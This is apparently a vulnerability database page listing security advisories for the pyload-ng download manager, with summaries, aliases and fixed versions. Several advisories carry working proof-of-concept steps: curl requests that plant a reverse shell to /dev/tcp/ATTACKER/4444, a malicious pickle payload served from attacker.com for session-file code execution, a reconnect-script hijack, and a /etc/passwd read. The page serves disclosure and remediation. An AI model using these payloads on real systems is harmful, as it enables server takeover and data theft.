Search for packages
| purl | pkg:pypi/pyload-ng@0.5.0b3.dev46 |
| Next non-vulnerable version | 0.5.0b3.dev100 |
| Latest non-vulnerable version | 0.5.0b3.dev100 |
| Risk | 4.5 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-1k5h-nhcv-cke9
Aliases: CVE-2026-42312 GHSA-ccxc-x975-4hh9 PYSEC-2026-126 |
pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The option ("general", "ssl_verify") is not on that allowlist. Any authenticated user with the non-admin SETTINGS permission can set general.ssl_verify = off, and every subsequent outbound pycurl request is made with SSL_VERIFYPEER=0 and SSL_VERIFYHOST=0 — TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100. |
Affected by 0 other vulnerabilities. |
|
VCID-3355-ps9v-7ffh
Aliases: CVE-2024-24808 GHSA-g3cm-qg2v-2hj5 |
URL Redirection to Untrusted Site ('Open Redirect') pyLoad is an open-source Download Manager written in pure Python. There is an open redirect vulnerability due to incorrect validation of input values when redirecting users after login. pyLoad is validating URLs via the `get_redirect_url` function when redirecting users at login. This vulnerability has been patched with commit fe94451. |
Affected by 22 other vulnerabilities. |
|
VCID-6ujx-ntw5-s7dy
Aliases: CVE-2026-35463 GHSA-w48f-wwwf-f5fr |
pyLoad: Improper Neutralization of Special Elements used in an OS Command ### Summary The `ADMIN_ONLY_OPTIONS` protection mechanism restricts security-critical configuration values (reconnect scripts, SSL certs, proxy credentials) to admin-only access. However, this protection is **only applied to core config options**, not to plugin config options. The `AntiVirus` plugin stores an executable path (`avfile`) in its config, which is passed directly to `subprocess.Popen()`. A non-admin user with SETTINGS permission can change this path to achieve remote code execution. ### Details **Safe wrapper — `ADMIN_ONLY_OPTIONS` (core/api/__init__.py:225-235):** ```python ADMIN_ONLY_OPTIONS = { "reconnect.script", # Blocks script path change "webui.host", # Blocks bind address change "ssl.cert_file", # Blocks cert path change "ssl.key_file", # Blocks key path change # ... other sensitive options } ``` **Where it IS enforced — core config (core/api/__init__.py:255):** ```python def set_config_value(self, section, option, value): if f"{section}.{option}" in ADMIN_ONLY_OPTIONS: if not self.user.is_admin: raise PermissionError("Admin only") # ... ``` **Where it is NOT enforced — plugin config (core/api/__init__.py:271-272):** ```python # Plugin config - NO admin check at all self.pyload.config.set_plugin(category, option, value) ``` **Dangerous sink — AntiVirus plugin (plugins/addons/AntiVirus.py:75):** ```python def scan_file(self, file): avfile = self.config.get("avfile") # User-controlled via plugin config avargs = self.config.get("avargs") subprocess.Popen([avfile, avargs, target]) # RCE ``` ### PoC ```bash # As non-admin user with SETTINGS permission: # 1. Set AntiVirus executable to a reverse shell curl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \ -d 'section=plugin' \ -d 'option=AntiVirus.avfile' \ -d 'value=/bin/bash' curl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \ -d 'section=plugin' \ -d 'option=AntiVirus.avargs' \ -d 'value=-c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"' # 2. Enable the AntiVirus plugin curl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \ -d 'section=plugin' \ -d 'option=AntiVirus.activated' \ -d 'value=True' # 3. Add a download - when it completes, AntiVirus.scan_file() runs the payload curl -b session_cookie -X POST http://TARGET:8000/api/add_package \ -d 'name=test' \ -d 'links=http://example.com/test.zip' # Result: reverse shell as the pyload process user ``` ### Additional Finding: Arbitrary File Read via storage_folder The `storage_folder` validation at `core/api/__init__.py:238-246` uses inverted logic — it prevents the new value from being INSIDE protected directories, but not from being an ANCESTOR of everything. Setting `storage_folder=/` combined with `GET /files/get/etc/passwd` gives arbitrary file read to non-admin users with SETTINGS+DOWNLOAD permissions. ### Impact - **Remote Code Execution** — Non-admin user can execute arbitrary commands via AntiVirus plugin config - **Privilege escalation** — SETTINGS permission (non-admin) escalates to full system access - **Arbitrary file read** — Via storage_folder manipulation ### Remediation Apply `ADMIN_ONLY_OPTIONS` to plugin config as well: ```python # In set_config_value(): ADMIN_ONLY_PLUGIN_OPTIONS = { "AntiVirus.avfile", "AntiVirus.avargs", # ... any plugin option that controls executables or paths } if section == "plugin" and option in ADMIN_ONLY_PLUGIN_OPTIONS: if not self.user.is_admin: raise PermissionError("Admin only") ``` Or better: validate that `avfile` points to a known AV binary before passing to `subprocess.Popen()`. | There are no reported fixed by versions. |
|
VCID-73d4-um61-k7ht
Aliases: CVE-2026-29778 GHSA-6px9-j4qr-xfjw PYSEC-2026-121 |
pyLoad is a free and open-source download manager written in Python. From version 0.5.0b3.dev13 to 0.5.0b3.dev96, the edit_package() function implements insufficient sanitization for the pack_folder parameter. The current protection relies on a single-pass string replacement of "../", which can be bypassed using crafted recursive traversal sequences. This issue has been patched in version 0.5.0b3.dev97. |
Affected by 4 other vulnerabilities. |
|
VCID-9rb6-kh78-sbdf
Aliases: CVE-2026-35464 GHSA-4744-96p5-mp2j |
pyLoad: Unprotected storage_folder enables arbitrary file write to Flask session store and code execution (Incomplete fix for CVE-2026-33509) ## Summary The fix for CVE-2026-33509 (GHSA-r7mc-x6x7-cqxx) added an `ADMIN_ONLY_OPTIONS` set to block non-admin users from modifying security-critical config options. The `storage_folder` option is not in this set and passes the existing path restriction because the Flask session directory is outside both PKGDIR and userdir. A user with SETTINGS and ADD permissions can redirect downloads to the Flask filesystem session store, plant a malicious pickle payload as a predictable session file, and trigger arbitrary code execution when any HTTP request arrives with the corresponding session cookie. ## Required Privileges The chain requires a single non-admin user with both `SETTINGS` (to change `storage_folder`) and `ADD` (to submit a download URL) permissions. These are independent bitmask flags that can be assigned together by an admin. The final RCE trigger is unauthenticated: any HTTP request with the crafted session cookie causes deserialization. ## Root Cause `storage_folder` at `src/pyload/core/api/__init__.py:238-246` has a path check that blocks writing inside PKGDIR or userdir using `os.path.realpath`. However, Flask's filesystem session directory (`/tmp/pyLoad/flask/` in the standard Docker deployment) is outside both restricted paths. pyload configures Flask with `SESSION_TYPE = "filesystem"` at `__init__.py:127`. The cachelib `FileSystemCache` stores session files as `md5("session:" + session_id)` and deserializes them with `pickle.load()` on every request that carries the corresponding session cookie. ## Proven RCE Chain Tested against `lscr.io/linuxserver/pyload-ng:latest` Docker image. **Step 1** — Change download directory to Flask session store: POST /api/set_config_value {"section":"core","category":"general","option":"storage_folder","value":"/tmp/pyLoad/flask"} The path check resolves `/tmp/pyLoad/flask/` via `realpath`. It does not start with PKGDIR (`/lsiopy/.../pyload/`) or userdir (`/config/`). Check passes. **Step 2** — Compute the target session filename: md5("session:ATTACKER_SESSION_ID") = 92912f771df217fb6fbfded6705dd47c Flask-Session uses cachelib which stores files as `md5(key_prefix + session_id)`. The default key prefix is `session:`. **Step 3** — Host and download the malicious pickle payload: import pickle, os, struct class RCE: def __reduce__(self): return (os.system, ("id > /tmp/pyload-rce-success",)) session = {"_permanent": True, "rce": RCE()} payload = struct.pack("I", 0) + pickle.dumps(session, protocol=2) # struct.pack("I", 0) = cachelib timeout header (0 = never expires) Serve as `http://attacker.com/92912f771df217fb6fbfded6705dd47c` and submit: POST /api/add_package {"name":"x","links":["http://attacker.com/92912f771df217fb6fbfded6705dd47c"],"dest":1} The file is saved to `/tmp/pyLoad/flask/92912f771df217fb6fbfded6705dd47c`. **Step 4** — Trigger deserialization (unauthenticated): curl http://target:8000/ -b "pyload_session_8000=ATTACKER_SESSION_ID" The session cookie name is `pyload_session_` + the configured port number (`__init__.py:128`). Flask loads the session file. cachelib reads the 4-byte timeout header, confirms the entry is not expired, and calls `pickle.load()`. The RCE gadget executes. **Result**: $ docker exec pyload-poc cat /tmp/pyload-rce-success uid=1000(abc) gid=1000(users) groups=1000(users) ## Impact A non-admin user with SETTINGS + ADD permissions achieves arbitrary code execution as the pyload service user. The final trigger requires no authentication. The attacker can: - Execute arbitrary commands with the privileges of the pyload process - Read environment variables (API keys, credentials) - Access the filesystem (download history, user database) - Pivot to other network resources ## Suggested Fix Add `storage_folder` to the ADMIN_ONLY set, or extend the path check to block writing to auto-consumed temporary directories (Flask session store, Jinja bytecode cache, pyload temp directory): ADMIN_ONLY_OPTIONS = { ... ("general", "storage_folder"), # ADDED: prevents session poisoning RCE ... } Also correct the existing wrong option names: ("webui", "ssl_certfile"), # FIXED: was "ssl_cert" (dead code) ("webui", "ssl_keyfile"), # FIXED: was "ssl_key" (dead code) | There are no reported fixed by versions. |
|
VCID-a7fd-nsys-qub1
Aliases: CVE-2024-47821 GHSA-w7hq-f2pj-c53g PYSEC-2024-302 |
pyLoad is a free and open-source Download Manager. The folder `/.pyload/scripts` has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved in versions prior to 0.5.0b3.dev87. A file can be downloaded to such a folder by changing the download folder to a folder in `/scripts` path and using the `/flashgot` API to download the file. This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system. Version 0.5.0b3.dev87 fixes this issue. |
Affected by 18 other vulnerabilities. |
|
VCID-bzxw-4smh-6yed
Aliases: CVE-2025-53890 GHSA-8w3f-4r8f-pf53 |
pyLoad vulnerable to XSS through insecure CAPTCHA An unsafe JavaScript evaluation vulnerability in pyLoad’s CAPTCHA processing code allows **unauthenticated remote attackers** to execute **arbitrary code** in the client browser and potentially the backend server. Exploitation requires no user interaction or authentication and can result in session hijacking, credential theft, and full system rce. |
Affected by 0 other vulnerabilities. |
|
VCID-c4n8-pnbr-buce
Aliases: CVE-2026-40594 GHSA-mp82-fmj6-f22v PYSEC-2026-125 |
pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev98, the set_session_cookie_secure before_request handler in src/pyload/webui/app/__init__.py reads the X-Forwarded-Proto header from any HTTP request without validating that the request originates from a trusted proxy, then mutates the global Flask configuration SESSION_COOKIE_SECURE on every request. Because pyLoad uses the multi-threaded Cheroot WSGI server (request_queue_size=512), this creates a race condition where an attacker's request can influence the Secure flag on other users' session cookies — either downgrading cookie security behind a TLS proxy or causing a session denial-of-service on plain HTTP deployments. This vulnerability is fixed in 0.5.0b3.dev98. |
Affected by 28 other vulnerabilities. Affected by 4 other vulnerabilities. |
|
VCID-f95r-tk7k-gufe
Aliases: CVE-2025-61773 GHSA-cjjf-27cc-pvmv |
pyLoad CNL and captcha handlers allow Code Injection via unsanitized parameters pyLoad web interface contained insufficient input validation in both the Captcha script endpoint and the Click'N'Load (CNL) Blueprint. This flaw allowed untrusted user input to be processed unsafely, which could be exploited by an attacker to inject arbitrary content into the web UI or manipulate request handling. The vulnerability could lead to client-side code execution (XSS) or other unintended behaviors when a malicious payload is submitted. user-supplied parameters from HTTP requests were not adequately validated or sanitized before being passed into the application logic and response generation. This allowed crafted input to alter the expected execution flow. CNL (Click'N'Load) blueprint exposed unsafe handling of untrusted parameters in HTTP requests. The application did not consistently enforce input validation or encoding, making it possible for an attacker to craft malicious requests. |
Affected by 12 other vulnerabilities. |
|
VCID-f9wx-gf1u-7bgc
Aliases: GHSA-3wwm-hjv7-23r3 |
Pyload log Injection via API /json/add_package in add_name parameter A log injection vulnerability was identified in `pyload` in API `/json/add_package`. This vulnerability allows user with add packages permission to inject arbitrary messages into the logs gathered by `pyload`. | There are no reported fixed by versions. |
|
VCID-h66k-vm3m-c3b6
Aliases: CVE-2026-42313 GHSA-pg67-9wjv-mr85 PYSEC-2026-127 |
pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The allowlist contains ("proxy", "username") and ("proxy", "password") — which protect the proxy credentials — but it does not include ("proxy", "enabled"), ("proxy", "host"), ("proxy", "port"), or ("proxy", "type"). Any authenticated user with the non-admin SETTINGS permission can enable proxying and point pyload at any host they control. From that point, every outbound download, captcha fetch, update check, and plugin HTTP call is transparently routed through the attacker. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100. |
Affected by 0 other vulnerabilities. |
|
VCID-hsc6-6qgc-q3eg
Aliases: CVE-2026-33314 GHSA-q485-cg9q-xq2r PYSEC-2026-122 |
pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, a Host Header Spoofing vulnerability in the @local_check decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS). This issue has been patched in version 0.5.0b3.dev97. |
Affected by 4 other vulnerabilities. |
|
VCID-hva8-kb62-rkax
Aliases: CVE-2024-39205 GHSA-r9pp-r4xf-597r |
Duplicate This advisory duplicates another. | There are no reported fixed by versions. |
|
VCID-jxej-fugb-3ydh
Aliases: CVE-2026-42314 GHSA-97r3-5w84-r4q8 PYSEC-2026-128 |
pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, package folder names are sanitized using insufficient string replacement. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS. This vulnerability is fixed in 0.5.0b3.dev100. |
Affected by 0 other vulnerabilities. |
|
VCID-mbkb-u95k-yfgc
Aliases: CVE-2025-55156 GHSA-pwh4-6r3m-j2rf |
PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter The parameter `add_links` in the API /json/add_package is vulnerable to SQL Injection. SQL injection vulnerabilities can lead to sensitive data leakage. |
Affected by 12 other vulnerabilities. |
|
VCID-nbnk-6g72-3ybk
Aliases: CVE-2024-22416 GHSA-pgpj-v85q-h5fm PYSEC-2024-17 |
pyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade. |
Affected by 23 other vulnerabilities. |
|
VCID-ng6u-saxg-dbf9
Aliases: CVE-2026-35592 GHSA-mvwx-582f-56r7 PYSEC-2026-124 |
pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the _safe_extractall() function in src/pyload/plugins/extractors/UnTar.py uses os.path.commonprefix() for its path traversal check, which performs character-level string comparison rather than path-level comparison. This allows a specially crafted tar archive to write files outside the intended extraction directory. The correct function os.path.commonpath() was added to the codebase in the CVE-2026-32808 fix (commit 5f4f0fa) but was never applied to _safe_extractall(), making this an incomplete fix. This vulnerability is fixed in 0.5.0b3.dev97. |
Affected by 4 other vulnerabilities. |
|
VCID-p22h-1rtx-bkcy
Aliases: CVE-2026-42315 GHSA-838g-gr43-qqg9 PYSEC-2026-129 |
pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, when passing a folder name in the set_package_data() API function call inside the data object with key "_folder", there is no sanitization at all, allowing a user with Perms.MODIFY to specify arbitrary directories as download locations for a package. This vulnerability is fixed in 0.5.0b3.dev100. |
Affected by 0 other vulnerabilities. |
|
VCID-pgh8-2pmw-7ba7
Aliases: CVE-2023-47890 GHSA-h73m-pcfw-25h2 |
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in pyload-ng. |
Affected by 27 other vulnerabilities. |
|
VCID-tbkm-qa82-jkaw
Aliases: CVE-2024-21644 GHSA-mqpq-2p68-46fv |
Improper Access Control pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77. |
Affected by 25 other vulnerabilities. |
|
VCID-u712-62py-aqgt
Aliases: CVE-2025-7346 GHSA-x698-5hjm-w2m5 |
pyLoad is vulnerable to attacks that bypass localhost restrictions, enabling the creation of arbitrary packages Any unauthenticated attacker can bypass the localhost restrictions posed by the application and utilize this to create arbitrary packages. | There are no reported fixed by versions. |
|
VCID-vzcg-gg18-9uhg
Aliases: CVE-2024-21645 GHSA-ghmw-rwh8-6qmr |
Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') pyLoad is the free and open-source Download Manager written in pure Python. A log injection vulnerability was identified in `pyload` allowing any unauthenticated actor to inject arbitrary messages into the logs gathered by `pyload`. Forged or otherwise, corrupted log files can be used to cover an attacker’s tracks or even to implicate another party in the commission of a malicious act. This vulnerability has been patched in version 0.5.0b3.dev77. |
Affected by 25 other vulnerabilities. |
|
VCID-vzzm-8en6-fydc
Aliases: CVE-2025-57751 GHSA-9gjj-6gj7-c4wj |
Denial-of-Service attack in pyLoad CNL Blueprint using dukpy.evaljs The `jk` parameter is received in pyLoad CNL Blueprint. Due to the lack of `jk` parameter verification, the `jk` parameter input by the user is directly determined as dykpy.evaljs(), resulting in the server CPU being fully occupied and the web-ui becoming unresponsive. |
Affected by 11 other vulnerabilities. |
|
VCID-x15r-v69w-yuaj
Aliases: CVE-2026-35586 GHSA-ppvx-rwh9-7rj7 PYSEC-2026-123 |
pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the ADMIN_ONLY_CORE_OPTIONS authorization set in set_config_value() uses incorrect option names ssl_cert and ssl_key, while the actual configuration option names are ssl_certfile and ssl_keyfile. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the ssl_certchain option was never added to the admin-only set at all. This vulnerability is fixed in 0.5.0b3.dev97. |
Affected by 4 other vulnerabilities. |
|
VCID-x1ek-3cgq-skh9
Aliases: CVE-2026-33509 GHSA-r7mc-x6x7-cqxx |
pyLoad SETTINGS Permission Users Can Achieve Remote Code Execution via Unrestricted Reconnect Script Configuration ## Summary The `set_config_value()` API endpoint allows users with the non-admin `SETTINGS` permission to modify any configuration option without restriction. The `reconnect.script` config option controls a file path that is passed directly to `subprocess.run()` in the thread manager's reconnect logic. A SETTINGS user can set this to any executable file on the system, achieving Remote Code Execution. The only validation in `set_config_value()` is a hardcoded check for `general.storage_folder` — all other security-critical settings including `reconnect.script` are writable without any allowlist or path restriction. ## Details The vulnerability chain spans two components: **1. Unrestricted config write — `src/pyload/core/api/__init__.py:210-243`** ```python @permission(Perms.SETTINGS) @post def set_config_value(self, category: str, option: str, value: Any, section: str = "core") -> None: self.pyload.addon_manager.dispatch_event( "config_changed", category, option, value, section ) if section == "core": if category == "general" and option == "storage_folder": # Forbid setting the download folder inside dangerous locations # ... validation only for storage_folder ... return self.pyload.config.set(category, option, value) # No validation for any other option ``` The `Perms.SETTINGS` permission (value 128) is a non-admin permission flag. The only hardcoded validation is for `general.storage_folder`. The `reconnect.script` option is written directly to config with no path validation, allowlist, or sanitization. **2. Arbitrary script execution — `src/pyload/core/managers/thread_manager.py:157-199`** ```python def try_reconnect(self): if not ( self.pyload.config.get("reconnect", "enabled") and self.pyload.api.is_time_reconnect() ): return False # ... checks if active downloads want reconnect ... reconnect_script = self.pyload.config.get("reconnect", "script") if not os.path.isfile(reconnect_script): self.pyload.config.set("reconnect", "enabled", False) self.pyload.log.warning(self._("Reconnect script not found!")) return # ... reconnect logic ... try: subprocess.run(reconnect_script) # Executes attacker-controlled path except Exception: # ... ``` The `reconnect_script` value comes directly from config. The only check is `os.path.isfile()` — the file must exist but there is no allowlist, no path restriction, and no signature verification. **3. Attacker also controls timing via same SETTINGS permission** The attacker can set `reconnect.enabled=True`, `reconnect.start_time`, and `reconnect.end_time` through the same `set_config_value()` endpoint to control when execution occurs. `toggle_reconnect()` at line 321 requires only `Perms.STATUS` — an even lower privilege. **4. Additional privilege escalation via config access** Beyond RCE, the same unrestricted config write allows SETTINGS users to: - Read proxy credentials (`proxy.username`/`proxy.password`) in plaintext via `get_config()` - Redirect syslog to an attacker-controlled server (`log.syslog_host`/`log.syslog_port`) - Disable SSL (`webui.use_ssl=False`), rebind to `0.0.0.0` (`webui.host`) - Modify SSL certificate/key paths to enable MITM ## PoC **Step 1: Set reconnect script to an attacker-controlled executable** Via API: ```bash # Authenticate and get session (as user with SETTINGS permission) curl -c cookies.txt -X POST 'http://target:8000/api/login' \ -d 'username=settingsuser&password=pass123' # Set reconnect script to a known executable on the system curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \ -d 'category=reconnect&option=script&value=/tmp/exploit.sh§ion=core' ``` Via Web UI: ```bash curl -b cookies.txt -X POST 'http://target:8000/json/save_config?category=core' \ -d 'reconnect|script=/tmp/exploit.sh&reconnect|enabled=True' ``` **Step 2: Enable reconnect and set timing window** ```bash curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \ -d 'category=reconnect&option=enabled&value=True§ion=core' curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \ -d 'category=reconnect&option=start_time&value=00:00§ion=core' curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \ -d 'category=reconnect&option=end_time&value=23:59§ion=core' ``` **Step 3: Script executes when thread manager calls `try_reconnect()`** The thread manager's `run()` method (called repeatedly by the core loop) invokes `try_reconnect()`, which calls `subprocess.run(reconnect_script)` at `thread_manager.py:199`. **Note on exploitation constraints:** The file at the target path must exist (`os.path.isfile()` check) and be executable. With `shell=False` (subprocess.run default), no arguments are passed. If the attacker also has `ADD` permission (common for non-admin users), they can use pyLoad to download an archive containing an executable script, which may retain execute permissions after extraction. ## Impact - **Remote Code Execution**: A non-admin user with SETTINGS permission can execute arbitrary programs on the server as the pyLoad process user - **Privilege escalation**: The SETTINGS permission is described as "can access settings" — granting it is not expected to grant arbitrary code execution capability - **Credential exposure**: SETTINGS users can read proxy credentials, SSL key paths, and other sensitive config values via `get_config()` - **Network reconfiguration**: SETTINGS users can disable SSL, change bind address, redirect logging, and modify other security-critical network settings ## Recommended Fix Add an allowlist or category-level restriction in `set_config_value()` that prevents non-admin users from modifying security-critical options: ```python # In set_config_value(), after the storage_folder check: ADMIN_ONLY_OPTIONS = { ("reconnect", "script"), ("webui", "host"), ("webui", "use_ssl"), ("webui", "ssl_cert"), ("webui", "ssl_key"), ("log", "syslog_host"), ("log", "syslog_port"), ("proxy", "username"), ("proxy", "password"), } if section == "core" and (category, option) in ADMIN_ONLY_OPTIONS: # Require ADMIN role for security-critical settings if not self.pyload.api.user_data.get("role") == Role.ADMIN: raise PermissionError(f"Admin role required to modify {category}.{option}") ``` Additionally, consider validating the `reconnect.script` path against an allowlist of directories or requiring admin approval for script path changes. | There are no reported fixed by versions. |
|
VCID-xgcy-vqcp-43dj
Aliases: GHSA-25pw-q952-x37g |
Duplicate Advisory: pyload-ng vulnerable to RCE with js2py sandbox escape ## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-r9pp-r4xf-597r. This link is maintained to preserve external references. ## Original Description An issue in pyload-ng v0.5.0b3.dev85 running under python3.11 or below allows attackers to execute arbitrary code via a crafted HTTP request. |
Affected by 18 other vulnerabilities. |
|
VCID-xhbh-mwv5-wfgf
Aliases: GHSA-2wcm-vx67-3x4q |
Duplicate Advisory: GHSA-x698-5hjm-w2m5 ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-x698-5hjm-w2m5. This link is maintained to preserve external references. ### Original Description Any unauthenticated attacker can bypass the localhost restrictions posed by the application and utilize this to create arbitrary packages |
Affected by 23 other vulnerabilities. |
|
VCID-xs39-z9t4-wyh9
Aliases: CVE-2024-32880 GHSA-3f7w-p8vr-4v5f |
pyLoad allows upload to arbitrary folder lead to RCE An authenticated user can change the download folder and upload a crafted template to the specified folder lead to remote code execution | There are no reported fixed by versions. |
|
VCID-yk3e-d92p-cubu
Aliases: CVE-2025-54802 GHSA-48rp-jc79-2264 |
Duplicate This advisory duplicates another. |
Affected by 14 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||